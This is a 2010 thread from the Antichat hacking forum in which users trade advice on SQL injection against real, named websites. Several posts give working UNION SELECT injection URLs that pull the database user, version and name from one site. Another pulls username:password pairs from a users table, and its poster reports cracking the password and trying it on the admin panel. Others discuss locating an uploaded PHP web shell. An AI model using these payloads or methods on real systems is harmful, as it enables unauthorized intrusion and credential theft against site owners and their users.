Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
14.02.2010, 14:16
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от _iks_
Для начала неплохо бы найти инклуд, если расширение как у картинки
Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".
|
|
|
14.02.2010, 14:19
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от _iks_
Фильтруется просто скорее всего. Кавычку ты ставил? Складывал\вычитал значения?
Ну да, складывал и вычитал, и ордэром проверял. Но дело в том что когда я у себя проверял(ну у меня смотрит строка или число, а если там запрос к приверу id=1 and 1=2, то он отправляет как строку), то у меня тоже открывается та же страница.
nerezus назвал мой метод "Самый говнокодистый говнокод в этой теме."
Код:
function secure($par) {
$numb = array("1","2","3","4","5","6","7","8","9","0","-");
if( get_magic_quotes_gpc())
{
$link = stripslashes($par);
}
$l=$par+1-1;
if ((string)$l==(string)$par) {
$par=(string)$par;
$new_par="";
for ($i=0;$i<>strlen($par);$i++) {
if (in_array($par{$i},$numb)) {
$new_par=$new_par.$par{$i};
}
if ($new_par<"-2147483648" || $new_par>"2147483647") $new_par="1";
$new_par=(int)$new_par;
}
}
else
{
$new_par=mysql_real_escape_string($par);
}
return $new_par;
}
по етому разобраться надо
|
|
|
|
14.02.2010, 17:09
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от keng
Я предположил, что он уже загрузил готовый шелл (*.php) и просто не может найти, куда именно (т.е., как к нему обратиться после загрузки). Он ведь написал - "точно знаю, что шелл в базе".
да да то4но заяруяется ну не знаю куда ..??
|
|
|
|
14.02.2010, 17:12
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Код:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ?
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql. |
|
|
|
14.02.2010, 17:46
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
CyberHunter
при запросе
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
Выводится тек.юзер, версия БД и имя бд.
а при запросе:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 --
выводится принтабельное поле, точнее при это запросе ничего не выводится,т.к. не правильно подобраны столбцы. Добавь еще .....5,6,7--
П.С, вот хорошая статья: http://forum.antichat.ru/thread104591.html
Последний раз редактировалось jecka3000; 14.02.2010 в 17:53..
|
|
|
|
14.02.2010, 17:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от CyberHunter
Код:
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7+--
wildshaman скажи почему при вводе твоего запроса, появляется тоже самое, что и
http://www.mpomed.ru/id1/?idI=-1+union+select+1,2,3,4 -- ? Почему то же самое?
З.Ы. Подскажите мб есть какая-то статья, в которой есть основные команды в языке sql.
http://www.mysql.ru/docs/mysql-man-5.0-en/sql-syntax.html#select
|
|
|
|
14.02.2010, 20:09
|
|
Новичок
Регистрация: 14.02.2010
Сообщений: 3
Провел на форуме:
2961
Репутация:
0
|
|
Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--
пароль расшифровали только, когда ввожу его в админку не заходит
|
|
|
|
14.02.2010, 20:21
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
|
|
|
|
14.02.2010, 20:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Tudesky
Вот что-то неочень могу разобраться с этой скулей http://vip-study.by/index.php?id=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word),7,8,9,10,11,12,13,14,15,16+from+users--
пароль расшифровали только, когда ввожу его в админку не заходит
Значит пароль не от админки, либо расшифрован неправильно.
Сообщение от CyberHunter
jecka3000 спс!
Еще хотел бы спросить при вводе команд типа union select, нужно ставить знак + между ними?
+ в URL-кодировке - пробел.
Сообщение от CyberHunter
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
Не понял...
Последний раз редактировалось mailbrush; 14.02.2010 в 20:25..
|
|
|
|
14.02.2010, 20:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Сообщение от CyberHunter
]И еще, вот допустим нашел я столбцы и т.д. и если хочу увидеть имя БД, то вместо одного номера нужно ввести нужную команду?
нужно вместо принтабельного столбца ввести слово database()
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
